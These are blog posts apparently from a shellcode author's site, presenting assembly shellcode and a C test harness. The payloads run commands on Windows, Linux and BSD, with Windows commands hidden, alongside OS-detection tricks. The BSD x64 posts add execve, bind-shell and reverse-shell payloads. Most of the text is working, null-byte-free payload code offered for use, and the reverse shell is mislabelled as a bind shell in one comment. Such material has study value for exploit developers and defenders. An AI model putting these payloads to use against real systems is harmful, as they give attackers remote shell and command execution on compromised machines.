The following isn’t entirely optimized although the windows code is derived from code by Peter Ferrie here.

Just to note, any command executed on Windows systems will be hidden.

;  Execute a command
;  Works on 32/64-bit versions of Windows and Linux
;
;  yasm -fbin exec.asm -oexec.bin
;  nasm -fbin exec.asm -oexec.bin
;
;  194 bytes
;
    bits    32
    
    push    esi
    push    edi
    push    ebx
    push    ebp
    
    xor     ecx, ecx          ; ecx=0
    mul     ecx               ; eax=0, edx=0
    
    push    eax
    push    eax
    push    eax
    push    eax
    push    eax               ; setup homespace for win64
    jmp     l_sb              ; load command
    
get_os:
    pop     edi               ; edi=cmd, argv
    mov     cl, 7
    ; initialize cmd/argv regardless of OS
    push    eax               ; argv[3]=NULL;
    push    edi               ; argv[2]=cmd
    repnz   scasb             ; skip command line
    stosb                     ; zero terminate
    push    edi               ; argv[1]="-c", 0
    scasw                     ; skip option
    stosb                     ; zero terminate
    push    edi               ; argv[0]="/bin//sh", 0
    push    esp               ; save argv
    push    edi               ; save pointer to "/bin//sh", 0
    
    mov     al, 6             ; eax=sys_close for Linux/BSD
    inc     ecx               ; ignored on x64
    jecxz   gos_x64           ; if ecx==0 we're 64-bit
    
    ; we're 32-bit
    ; if gs is zero, we're native 32-bit windows
    mov     cx, gs
    jecxz   win_cmd
    
    ; if eax is zero after right shift of SP, ASSUME we're on windows
    push    esp
    pop     eax
    shr     eax, 24
    jz      win_cmd
    
    ; we're 32-bit Linux
    mov     al, 11            ; eax=sys_execve
    pop     ebx               ; ebx="/bin//sh", 0
    pop     ecx               ; ecx=argv
    int     0x80
    
    ; we're 64-bit, execute syscall and see what
    ; error returned
gos_x64:
    push    -1
    pop     edi
    syscall
    cmp     al, 5             ; Access Violation indicates windows
    push    59
    pop     eax
    cdq
    jz      win_cmd
    
    pop     edi              ; rdi="/bin//sh", 0
    pop     esi              ; rsi=argv
    syscall
l_sb:
    jmp     ld_cmd
    ; following code is derived from Peter Ferrie's calc shellcode
    ; i've modified it to execute commands
win_cmd:
    pop     eax               ; eax="/bin//sh", 0
    pop     eax               ; eax=argv
    pop     eax               ; eax="/bin//sh", 0
    pop     eax               ; eax="-c", 0
    pop     ecx               ; ecx=cmd
    pop     eax               ; eax=0
    
    inc     eax
    xchg    edx, eax
    jz      x64

    push    eax               ; will hide
    push    ecx               ; cmd
    
    mov     esi, [fs:edx+2fh]
    mov     esi, [esi+0ch]
    mov     esi, [esi+0ch]
    lodsd
    mov     esi, [eax]
    mov     edi, [esi+18h]
    mov     dl, 50h
    jmp     lqe
    bits 64
x64:
    mov     dl, 60h
    mov     rsi, [gs:rdx]
    mov     rsi, [rsi+18h]
    mov     rsi, [rsi+10h]
    lodsq
    mov     rsi, [rax]
    mov     rdi, [rsi+30h]
lqe:
    add     edx, [rdi+3ch]
    mov     ebx, [rdi+rdx+28h]
    mov     esi, [rdi+rbx+20h]
    add     rsi, rdi
    mov     edx, [rdi+rbx+24h]
fwe:
    movzx   ebp, word [rdi+rdx]
    lea     rdx, [rdx+2]
    lodsd
    cmp     dword [rdi+rax], 'WinE'
    jne     fwe
    
    mov     esi, [rdi+rbx+1ch]
    add     rsi, rdi
    
    mov     esi, [rsi+rbp*4]
    add     rdi, rsi
    cdq
    call    rdi
cmd_end:
    bits    32
    pop     eax
    pop     eax
    pop     eax
    pop     eax
    pop     eax
    pop     ebp
    pop     ebx
    pop     edi
    pop     esi
    ret
ld_cmd:
    call   get_os
    ; place command here
    ;db     "notepad", 0xFF
    ; do not change anything below  
    ;db      "-c", 0xFF, "/bin//sh", 0

Test Unit

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#if defined (_WIN32) || defined(_WIN64)
#define WIN
#include <windows.h>
#else
#include <sys/mman.h>
#endif

#define CMD_LEN_OFS 0x10+1
#define EXEC_SIZE 194

char exec[]= {
  /* 0000 */ "\x56"                         /* push esi                        */
  /* 0001 */ "\x57"                         /* push edi                        */
  /* 0002 */ "\x53"                         /* push ebx                        */
  /* 0003 */ "\x55"                         /* push ebp                        */
  /* 0004 */ "\x31\xc9"                     /* xor ecx, ecx                    */
  /* 0006 */ "\xf7\xe1"                     /* mul ecx                         */
  /* 0008 */ "\x50"                         /* push eax                        */
  /* 0009 */ "\x50"                         /* push eax                        */
  /* 000A */ "\x50"                         /* push eax                        */
  /* 000B */ "\x50"                         /* push eax                        */
  /* 000C */ "\x50"                         /* push eax                        */
  /* 000D */ "\xeb\x37"                     /* jmp 0x46                        */
  /* 000F */ "\x5f"                         /* pop edi                         */
  /* 0010 */ "\xb1\x00"                     /* mov cl, 0x0                     */
  /* 0012 */ "\x50"                         /* push eax                        */
  /* 0013 */ "\x57"                         /* push edi                        */
  /* 0014 */ "\xf2\xae"                     /* repne scasb                     */
  /* 0016 */ "\xaa"                         /* stosb                           */
  /* 0017 */ "\x57"                         /* push edi                        */
  /* 0018 */ "\x66\xaf"                     /* scasw                           */
  /* 001A */ "\xaa"                         /* stosb                           */
  /* 001B */ "\x57"                         /* push edi                        */
  /* 001C */ "\x54"                         /* push esp                        */
  /* 001D */ "\x57"                         /* push edi                        */
  /* 001E */ "\xb0\x06"                     /* mov al, 0x6                     */
  /* 0020 */ "\x41"                         /* inc ecx                         */
  /* 0021 */ "\xe3\x12"                     /* jecxz 0x35                      */
  /* 0023 */ "\x66\x8c\xe9"                 /* mov cx, gs                      */
  /* 0026 */ "\xe3\x20"                     /* jecxz 0x48                      */
  /* 0028 */ "\x54"                         /* push esp                        */
  /* 0029 */ "\x58"                         /* pop eax                         */
  /* 002A */ "\xc1\xe8\x18"                 /* shr eax, 0x18                   */
  /* 002D */ "\x74\x19"                     /* jz 0x48                         */
  /* 002F */ "\xb0\x0b"                     /* mov al, 0xb                     */
  /* 0031 */ "\x5b"                         /* pop ebx                         */
  /* 0032 */ "\x59"                         /* pop ecx                         */
  /* 0033 */ "\xcd\x80"                     /* int 0x80                        */
  /* 0035 */ "\x6a\xff"                     /* push 0xffffffff                 */
  /* 0037 */ "\x5f"                         /* pop edi                         */
  /* 0038 */ "\x0f\x05"                     /* syscall                         */
  /* 003A */ "\x3c\x05"                     /* cmp al, 0x5                     */
  /* 003C */ "\x6a\x3b"                     /* push 0x3b                       */
  /* 003E */ "\x58"                         /* pop eax                         */
  /* 003F */ "\x99"                         /* cdq                             */
  /* 0040 */ "\x74\x06"                     /* jz 0x48                         */
  /* 0042 */ "\x5f"                         /* pop edi                         */
  /* 0043 */ "\x5e"                         /* pop esi                         */
  /* 0044 */ "\x0f\x05"                     /* syscall                         */
  /* 0046 */ "\xeb\x75"                     /* jmp 0xbd                        */
  /* 0048 */ "\x58"                         /* pop eax                         */
  /* 0049 */ "\x58"                         /* pop eax                         */
  /* 004A */ "\x58"                         /* pop eax                         */
  /* 004B */ "\x58"                         /* pop eax                         */
  /* 004C */ "\x59"                         /* pop ecx                         */
  /* 004D */ "\x58"                         /* pop eax                         */
  /* 004E */ "\x40"                         /* inc eax                         */
  /* 004F */ "\x92"                         /* xchg edx, eax                   */
  /* 0050 */ "\x74\x16"                     /* jz 0x68                         */
  /* 0052 */ "\x50"                         /* push eax                        */
  /* 0053 */ "\x51"                         /* push ecx                        */
  /* 0054 */ "\x64\x8b\x72\x2f"             /* mov esi, [fs:edx+0x2f]          */
  /* 0058 */ "\x8b\x76\x0c"                 /* mov esi, [esi+0xc]              */
  /* 005B */ "\x8b\x76\x0c"                 /* mov esi, [esi+0xc]              */
  /* 005E */ "\xad"                         /* lodsd                           */
  /* 005F */ "\x8b\x30"                     /* mov esi, [eax]                  */
  /* 0061 */ "\x8b\x7e\x18"                 /* mov edi, [esi+0x18]             */
  /* 0064 */ "\xb2\x50"                     /* mov dl, 0x50                    */
  /* 0066 */ "\xeb\x17"                     /* jmp 0x7f                        */
  /* 0068 */ "\xb2\x60"                     /* mov dl, 0x60                    */
  /* 006A */ "\x65\x48"                     /* dec eax                         */
  /* 006C */ "\x8b\x32"                     /* mov esi, [edx]                  */
  /* 006E */ "\x48"                         /* dec eax                         */
  /* 006F */ "\x8b\x76\x18"                 /* mov esi, [esi+0x18]             */
  /* 0072 */ "\x48"                         /* dec eax                         */
  /* 0073 */ "\x8b\x76\x10"                 /* mov esi, [esi+0x10]             */
  /* 0076 */ "\x48"                         /* dec eax                         */
  /* 0077 */ "\xad"                         /* lodsd                           */
  /* 0078 */ "\x48"                         /* dec eax                         */
  /* 0079 */ "\x8b\x30"                     /* mov esi, [eax]                  */
  /* 007B */ "\x48"                         /* dec eax                         */
  /* 007C */ "\x8b\x7e\x30"                 /* mov edi, [esi+0x30]             */
  /* 007F */ "\x03\x57\x3c"                 /* add edx, [edi+0x3c]             */
  /* 0082 */ "\x8b\x5c\x17\x28"             /* mov ebx, [edi+edx+0x28]         */
  /* 0086 */ "\x8b\x74\x1f\x20"             /* mov esi, [edi+ebx+0x20]         */
  /* 008A */ "\x48"                         /* dec eax                         */
  /* 008B */ "\x01\xfe"                     /* add esi, edi                    */
  /* 008D */ "\x8b\x54\x1f\x24"             /* mov edx, [edi+ebx+0x24]         */
  /* 0091 */ "\x0f\xb7\x2c\x17"             /* movzx ebp, word [edi+edx]       */
  /* 0095 */ "\x48"                         /* dec eax                         */
  /* 0096 */ "\x8d\x52\x02"                 /* lea edx, [edx+0x2]              */
  /* 0099 */ "\xad"                         /* lodsd                           */
  /* 009A */ "\x81\x3c\x07\x57\x69\x6e\x45" /* cmp dword [edi+eax], 0x456e6957 */
  /* 00A1 */ "\x75\xee"                     /* jnz 0x91                        */
  /* 00A3 */ "\x8b\x74\x1f\x1c"             /* mov esi, [edi+ebx+0x1c]         */
  /* 00A7 */ "\x48"                         /* dec eax                         */
  /* 00A8 */ "\x01\xfe"                     /* add esi, edi                    */
  /* 00AA */ "\x8b\x34\xae"                 /* mov esi, [esi+ebp*4]            */
  /* 00AD */ "\x48"                         /* dec eax                         */
  /* 00AE */ "\x01\xf7"                     /* add edi, esi                    */
  /* 00B0 */ "\x99"                         /* cdq                             */
  /* 00B1 */ "\xff\xd7"                     /* call edi                        */
  /* 00B3 */ "\x58"                         /* pop eax                         */
  /* 00B4 */ "\x58"                         /* pop eax                         */
  /* 00B5 */ "\x58"                         /* pop eax                         */
  /* 00B6 */ "\x58"                         /* pop eax                         */
  /* 00B7 */ "\x58"                         /* pop eax                         */
  /* 00B8 */ "\x5d"                         /* pop ebp                         */
  /* 00B9 */ "\x5b"                         /* pop ebx                         */
  /* 00BA */ "\x5f"                         /* pop edi                         */
  /* 00BB */ "\x5e"                         /* pop esi                         */
  /* 00BC */ "\xc3"                         /* ret                             */
  /* 00BD */ "\xe8\x4d\xff\xff\xff"         /* call 0xf                        */
};

// save code to binary file
void bin2file (uint8_t bin[], size_t len)
{
  FILE *out=fopen ("sh_cmd.bin", "wb");
  if (out!=NULL)
  {
    fwrite (bin, 1, len, out);
    fclose (out);
  }
}
// allocate read/write and executable memory
// copy data from code and execute
void xcode(void *code, size_t code_len, char *cmd, size_t cmd_len)
{
  void *bin;
  int  i;
  uint8_t *p;
  char args[]="\xFF-c\xFF/bin//sh\x00";
  size_t total_len, arg_len;
  
  arg_len=strlen(args) + 1;
  
  printf ("[ executing code...\n");
    
#ifdef WIN
  bin=VirtualAlloc (0, code_len + cmd_len + arg_len, 
    MEM_COMMIT, PAGE_EXECUTE_READWRITE);
#else
  bin=mmap (0, code_len + cmd_len + arg_len, 
    PROT_EXEC | PROT_WRITE | PROT_READ, 
    MAP_ANON  | MAP_PRIVATE, -1, 0);
#endif
  if (bin!=NULL)
  {
    p=(uint8_t*)bin;
    
    memcpy (p, code, code_len);
    // set the cmd length
    p[CMD_LEN_OFS] = (uint8_t)cmd_len;
    // copy cmd
    memcpy ((void*)&p[code_len], cmd, cmd_len);
    // copy argv
    memcpy ((void*)&p[code_len+cmd_len], args, arg_len);
    
    //DebugBreak();
    bin2file(bin, code_len+cmd_len+arg_len);
    
    // execute
    ((void(*)())bin)();
    
#ifdef WIN
    VirtualFree (bin, code_len, MEM_RELEASE);
#else
    munmap (bin, code_len);
#endif
  }
}

int main(int argc, char *argv[])
{
    size_t len;
    char   *cmd;
    
    if (argc != 2) {
      printf ("\n  usage: xcmd <command>\n");
      return 0;
    }
    
    cmd=argv[1];
    len=strlen(cmd);
    
    if (len==0 || len>255) {
      printf ("\n  invalid command length: %i (must be between 1 and 255)", len);
      return 0;
    }
    
    xcode(exec, EXEC_SIZE, cmd, len);
    
    return 0;
}

See repository here for code and any future updates.

Posted in assembly, bsd, linux, shellcode, windows | Tagged , , , , , | 1 Comment

Shellcode: Detection between Windows/Linux/BSD on x86 architecture

Introduction

While writing simple Linux/BSD shellcodes, I had a quick look through a FreeBSD/Linux bind shell written in 2002 by a talented coder who went by the pseudonym Z0MBiE. Some of you will know he wrote a lot of cool stuff back in the day.

Since most of the syscall numbers differ on Linux/BSD, he devised a clever way of detecting between the 2 using sys_close system call with an invalid handle. They both use the same call number (6) but return different error codes.

B3mB4m left a comment referencing a post from 2013 which also attempts to address the problem of detecting between Linux and Windows.

What I show here is really just the result of some hours work and not extensive research into how many ways it can be done because there are probably a number of ways to do it. The codes are for demonstration only, they’re unoptimized and unlikely to be updated anytime soon but feel free to leave comments on alternative methods. πŸ™‚

Detection of CPU Mode

The steps are similar to what was discussed by some already but I check stack pointer to make distinction between 32-bit versions of windows and linux when the GS register is non-negative.

  1. Is our application executing 32-bit or 64-bit code? (determined by REX prefix)
  2. Are we running under 64-bit versions of Windows, Linux, BSD? (determined by sys_close and syscall, GS and SP registers tested for 32-bit windows)
  3. Are we Linux or BSD? (determined by sys_close and int 0x80)

To jump to 32-bit code, you could use

;
    xor    eax, eax
    dec    eax
    js     x32

To jump to 64-bit code, you could use

;
    xor    eax, eax
    inc    eax
    jz     x64

Windows native or emulated?

For a 32-bit native application, GS should always be zero so here’s a function that returns TRUE for native else FALSE

is_32bit:
    xor    eax, eax
    mov    ax, gs
    cmp    eax, 1
    sbb    eax, eax
    neg    eax
    ret

I’m unaware of a reliable method to test for 32-bit native code on Linux or BSD systems. Perhaps there’s a way to perform checks on segment registers but I’ve no idea how reliable that would be.

Windows, Linux or BSD?

Initially, I had some rough ideas; manipulation of EFLAGS/RFLAGS, FPU instructions, value of segment registers, the contents of them.

The manipulation of FLAGS didn’t result in anything and neither did investigation of FPU control word (although MSVC and GNU C do set it differently by default)

Windows Segments

Unfortunately my current computer would not be capable of running Win8,2012 or Win10 so only Win7 was tested.

Windows 7 x86 PE32
cs=0x1B ds=0x23 es=0x23 fs=0x3B gs=0x00 ss=0x23 sp=0025F928
  
Windows 7 x64 PE32
cs=0x23 ds=0x2B es=0x2B fs=0x53 gs=0x2B ss=0x2B sp=0033F9C0

Windows 7 x64 PE64
cs=0x33 ds=0x2B es=0x2B fs=0x53 gs=0x2B ss=0x2B sp=000000000020FB48

As you can see, the stack pointer for both modes are well below a signed 32/64-bit value.
Now look at BSD/Linux values.

OpenBSD

Only native ELF files were tested.

OpenBSD x86 ELF32
cs=0x2B ds=0x33 es=0x33 fs=0x5B gs=0x63 ss=0x33 sp=0xcf7c502c

OpenBSD x64 ELF64
cs=0x2B ds=0x23 es=0x23 fs=0x23 gs=0x23 ss=0x23 sp=0x7f7fffff7fe8

Compared with Windows, the stack pointer as 32-bit value is signed, but not always.

FreeBSD

FreeBSD x64 ELF32
cs=0x33 ds=0x3B es=0x3B fs=0x13 gs=0x1B ss=0x3B sp=0xffffda1c

FreeBSD x64 ELF64
cs=0x43 ds=0x3B es=0x3B fs=0x13 gs=0x1B ss=0x3B sp=0x7fffffffe8b8

Again, we can see that the 32-bit stack pointer is signed but this is not a sure thing.

Linux

Debian x86 ELF32
cs=0x73 ds=0x7B es=0x7B fs=0x00 gs=0x33 ss=0x7B sp=0xbfe7b97c

Debian x64 ELF32
cs=0x23 ds=0x2B es=0x2B fs=0x00 fs=0x63 ss=0x2B sp=0xffa66dbc
  
Debian x64 ELF64
cs=0x33 ds=0x00 es=0x00 fs=0x00 gs=0x00 ss=0x2B sp=0x7ffc88e3e048

*NIX or Windows?

Based on the results above, I initially thought testing the stack pointer for signedness would make the distinction between Windows or Linux/BSD and here’s code just to illustrate the idea.

; *************************
; int is_nix(void);
;
; 0=Windows x86/x64
; 1=BSD x86/x64 or Linux x86/x64
;
; *************************
    bits   32
is_nix:
    push   esp              ; save esp/rsp
    pop    eax              ; pop in eax/rax
    cdq                     ; edx=(eax < 0) ? -1 : 0
    neg    edx              ; 0=windows, 1=bsd or linux
    xchg   eax, edx
    ret

This is okay except the 32-bits of SP on Linux/BSD isn’t always signed so it might make a nice random decision function if nothing else.

; *************************
; int is_nix(void);
;
; 0=Windows x86/x64
; 1=BSD x86/x64 or Linux x86/x64
;
; *************************
    bits   32
is_nix:
    push   esp
    pop    eax
    shr    eax, 24
    setnz  al
    ret

This is a bit more reliable than the first version since by default, the stack pointer should be less than 1MB. It can obviously be specified using /STACK parameter of MSVC linker but this is what I thought works reasonably well to detect between 32-bit versions of windows and Linux/BSD.

What was easier (at least on Windows 7 64-bit) was detection of 64-bit OS when using syscall.
Using the original method documented by Z0MBiE/29a for detecting FreeBSD/Linux, I was surprised that the 64-bit version will also work with Windows 7 and is maybe a potential solution for more recent versions of windows.

On 64-bit Windows 7, error returned is 0xC0000005 or Access Violation Error
On 64-bit Linux, error returned is 0xFFFFFFF2 or -14
On 64-bit BSD, error returned is 9

%define WIN64_NATIVE 0
%define LIN64_NATIVE 1
%define BSD64_NATIVE 2

%define WIN32_NATIVE 3
%define WIN32_EMULAT 4
%define LIN32_EMUNAT 5
%define BSD32_EMUNAT 6

    bits   32
get_os:
_get_os:
    ; first, determine if we're in 32 or 64-bit mode
    push   6                ; sys_close on linux/bsd
    pop    eax              ; rax/eax=sys_close
    cdq                     ; rdx/edx=0
    dec    edx              ; ignored if 64-bit mode
    js     x32
    ; see what 64-bit OS we're on
    push   edx              ; save rdx/edx
    pop    edi              ; restore to rdi/edi
    syscall                 ; 
    xor    edx, edx         ; edx=WIN64_NATIVE
    ; win64 native?
    cmp    eax, 0xC0000005  ; Access Violation?
    jz     ex_ga
    inc    dl               ; edx=LIN64_NATIVE
    test   eax, eax         
    jl     ex_ga           
    mov    dl, BSD64_NATIVE
ex_ga:
    xchg   eax, edx
    ret
x32:
    inc    edx
    mov    dl, WIN32_NATIVE
    ; if gs is zero, we're win32 native
    xor    ecx, ecx
    mov    cx, gs
    jecxz  ex_ga
    
    ; if fs isn't zero, we might be BSD or Linux 
    ; check SP instead
    ; just because eax would result in zero, doesn't
    ; necessarily mean we are on windows...
    push   esp
    pop    eax
    mov    dl, WIN32_EMULAT
    shr    eax, 24
    jz     ex_ga
    
    ; we could say fs being zero is linux
    ; but better to check with sys_close
    ;mov    cx, fs
    ;test   ecx, ecx
    ;jnz    ex_ga
    
    ; are we linux or bsd?
    ; no reliable way to determine if emulated
    ; or not since openbsd uses same value for
    ; some segments
    push   -1
    int    0x80
    push   LIN32_EMUNAT
    pop    edx
    test   eax, eax
    pop    eax
    jl     ex_ga
    mov    dl, BSD32_EMUNAT
    jmp    ex_ga

Summary

There would have to be smarter ways of detecting operating systems running on the x86 architecture using assembly but would obviously result in more code. I’ve just presented a few bits of code that might be of interest to some. πŸ™‚

Posted in assembly, bsd, freebsd, linux, programming, security, shellcode, windows | Tagged , , , , , , , | 4 Comments

Shellcode: FreeBSD / OpenBSD x86-64

Introduction

These are mostly the same as codes for x64 Linux with the main difference being system call numbers. I’ve also noticed that BSD tends to be less forgiving with parameters (at least for some functions). Initially, I couldn’t get execve() to work with NULL argv and NULL envp which works fine on Linux.

Well, it turns out the BSD kernel doesn’t like NULL argv and simply returns EFAULT (Bad Address) so you need to supply it. Apart from this, they’re almost identical and you probably could detect the difference between BSD and Linux kernels before executing the appropriate code.

Detection between Linux and BSD

Since you might be wondering how to do that..

One thing we know is that system calls on BSD trash specific registers whereas Linux saves them. That’s one way of checking..

But perhaps a more reliable method I found was used by Z0MBiE/29a in shellcode of his from 2002. He attempts to close an invalid handle/descriptor and depending on the error executes BSD or Linux code and this is probably the best approach.

; detect if linux/freebsd
  pusha
  push    byte 6          ; FN: linux/freebsd: EAX=6=close()
  pop     eax
  xor     ebx, ebx
  dec     ebx
  push    ebx             ; PARAM: EBX=handle=-1
  push    esp
  int     80h             ; PARAMS: handle

  pop     ecx
  pop     ecx
  or      eax, eax        ; linux: EAX=-9  freebsd: EAX=9=EBADF
  popa
  jl      short __linux   ; jl == jmp if linux πŸ˜‰

sys_close() with invalid handle/descriptor returns number greater than zero on BSD but on Linux returns number less than zero.

So the above example works on x86 (in 2002) and the following will work for x64.

; detection of bsd/linux
    push    -1               ; invalid file descriptor
    pop     rdi
    push    6                ; sys_close
    pop     rax
    syscall
    test    eax, eax         ; BSD returns rax>0
    jl      linux            ; Linux returns rax<0
    ; execute bsd code here

I’m not demonstrating the mixture of Linux and BSD shellcode here today but that might be useful for somebody else to know. What follows are the x64 shellcodes for openbsd/freebsd.

Execute /bin/sh

Because sys_execve call is 59 on all 3 systems, this works with BSD and Linux.

; 24 byte execve("/bin//sh", {"/bin//sh", NULL}, 0);
; x64 versions of freebsd + openbsd + linux
; odzhan

    bits 64

    push    59
    pop     rax
    cdq                      ; rdx=envp=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; rdi="/bin//sh", 0
    ; ---------
    push    rdx              ; argv[1]=NULL
    push    rdi              ; argv[0]="/bin//sh", 0
    push    rsp
    pop     rsi              ; rsi=argv
    ; ---------
    syscall

Execute a command

; 39 byte execve("/bin//sh", {"/bin//sh", "-c", cmd, NULL}, 0);
; x64 versions of freebsd + openbsd + linux
; odzhan

    bits    64
start64:
    push    59
    pop     rax              ; rax=sys_execve
    cdq                      ; rdx=penv=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; rdi="/bin//sh", 0
    ; ---------
    push    rdx              ; 0
    push    word '-c'
    push    rsp
    pop     rbx              ; rbx="-c", 0
    push    rdx              ; argv[3]=NULL
    jmp     l_cmd64
r_cmd64:                     ; argv[2]=cmd
    push    rbx              ; argv[1]="-c"
    push    rdi              ; argv[0]="/bin//sh"
    push    rsp
    pop     rsi              ; rsi=argv
    syscall
l_cmd64:
    call    r_cmd64
    ; put your command here followed by null terminator

Bind Shell

; 73 byte bind shell
; x64 versions of freebsd + openbsd
; odzhan

    bits    64
    
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    97
    pop     rax              ; rax = sys_socket
    push    1
    pop     rsi              ; rsi = SOCK_STREAM
    push    2
    pop     rdi              ; rdi = AF_INET 
    cdq                      ; rdx = IPPROTO_IP    
    syscall
    
    xchg    eax, edi         ; edi = s
    
    ; step 2, bind to port 1234 
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    mov     ebx, 0xD204FF02  ; 
    inc     bh
    push    rbx
    push    rsp
    pop     rsi              ; rsi = &sa
    mov     dl, 16           ; rdx = sizeof(sa)
    mov     al, 104          ; rax = sys_bind
    syscall
    
    ; step 3, listen
    ; listen(s, 0);
    push    rax
    pop     rsi
    mov     al, 106          ; rax = sys_listen
    syscall
    
    ; step 4, accept connections
    ; accept(s, 0, 0);
    mov     al, 30           ; rax = sys_accept 
    syscall
    
    xchg    eax, edi         ; edi = r, eax = 2
    xchg    eax, esi         ; esi = 2, eax = 0
    
    ; step 5, assign socket handle to stdin,stdout,stderr
    ; dup2 (r, STDIN_FILENO)
    ; dup2 (r, STDOUT_FILENO)
    ; dup2 (r, STDERR_FILENO)
dup_loop64:
    mov     al, 90           ; rax = sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed   
    
    ; step 6, execute /bin/sh
    ; execve("/bin//sh", {"/bin//sh", NULL}, NULL);
    cdq                      ; rdx = 0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    ; ---------
    push    rdx              ; argv[1] = NULL
    push    rdi              ; argv[0] = "/bin//sh", 0
    push    rsp
    pop     rsi              ; rsi = argv
    ; ---------
    mov     al, 59           ; rax = sys_execve
    syscall

Reverse Shell

; 68 byte bind shell
; x64 versions of freebsd + openbsd
; odzhan

    bits    64
    
    mov     rax, ~0x0100007fd2040200
    not     rax
    push    rax
    push    rsp
    
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    97
    pop     rax              ; rax = sys_socket
    push    1
    pop     rsi              ; rsi = SOCK_STREAM
    push    2
    pop     rdi              ; rdi = AF_INET  
    cdq                      ; rdx = IPPROTO_IP    
    syscall
    
    xchg    eax, edi         ; edi = s
    xchg    eax, esi         ; esi = 2
    
    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2 (s, STDIN_FILENO)
    ; dup2 (s, STDOUT_FILENO)
    ; dup2 (s, STDERR_FILENO)
dup_loop64:
    mov     al, 90           ; rax = sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed
    
    ; step 3, connect to remote host
    ; connect (s, &sa, sizeof(sa));
    pop     rsi              ; rsi = &sa
    mov     dl, 16           ; rdx = sizeof(sa)
    mov     al, 98           ; rax = sys_connect
    syscall    
    
    ; step 4, execute /bin/sh
    ; execve("/bin//sh", {"/bin//sh", NULL}, NULL);
    cdq                      ; rdx = 0
    mov     rbx, '/bin//sh'  ; 
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    ; ---------
    push    rdx              ; argv[1] = NULL
    push    rdi              ; argv[0] = "/bin//sh", 0
    push    rsp
    pop     rsi              ; rsi = argv
    ; ---------
    mov     al, 59           ; rax = sys_execve
    syscall

Sources

Check out bsd folder. The only code there compatible with linux would be sh64.asm

Q & A

Why not save bytes by MOV’ing immediate values into RSI, RDI etc. for SYSCALL rather than PUSH’ing them on the stack and POP’ing them into registers for SYSCALL?

The goal of writing codes like this is to 1) Minimize size and 2) Avoid using null bytes where ever possible.

If the immediate value is short form (between -128 and +128) the PUSH opcode is only 2 bytes. The POP is 1.

The same is true for direct/conditional jumps and calls or addressing variables on stack.

So when RDI needs set to AF_INET(2) and RSI set to SOCK_STREAM(1) for the sys_socket call, here are some ways you could do it using MOV.

Using lower 8 bit registers which doesn’t zero out the upper 56-bits. (6 bytes)

//
  /* 0000 */ "\x40\xb7\x02" /* mov dil, 0x2 */
  /* 0003 */ "\x40\xb6\x01" /* mov sil, 0x1 */

Using 32-bit registers which does clear upper 32-bit bits but takes 10 bytes and contains nulls.

//
  /* 0000 */ "\xbf\x02\x00\x00\x00" /* mov edi, 0x2 */
  /* 0005 */ "\xbe\x01\x00\x00\x00" /* mov esi, 0x1 */

Using 64-bit registers which is 14 bytes and contains nulls.

//
  /* 0000 */ "\x48\xc7\xc7\x02\x00\x00\x00" /* mov rdi, 0x2 */
  /* 0007 */ "\x48\xc7\xc6\x01\x00\x00\x00" /* mov rsi, 0x1 */

Using the PUSH/POP method because we know immediate values are short form.
This also zeros out upper 56-bits and doesn’t contain null bytes and only 6 bytes.

//
  /* 0000 */ "\x6a\x02" /* push 0x2 */
  /* 0002 */ "\x5f"     /* pop rdi  */
  /* 0003 */ "\x6a\x01" /* push 0x1 */
  /* 0005 */ "\x5e"     /* pop rsi  */

It is also acceptable 32-bit code (should it be needed)

//
  /* 0000 */ "\x6a\x02" /* push 0x2 */
  /* 0002 */ "\x5f"     /* pop edi  */
  /* 0003 */ "\x6a\x01" /* push 0x1 */
  /* 0005 */ "\x5e"     /* pop esi  */

There are obviously other ways to do this but they all result in being larger than a PUSH/POP combination.

Posted in assembly, bsd, freebsd, openbsd, shellcode | Tagged , , , , , | 2 Comments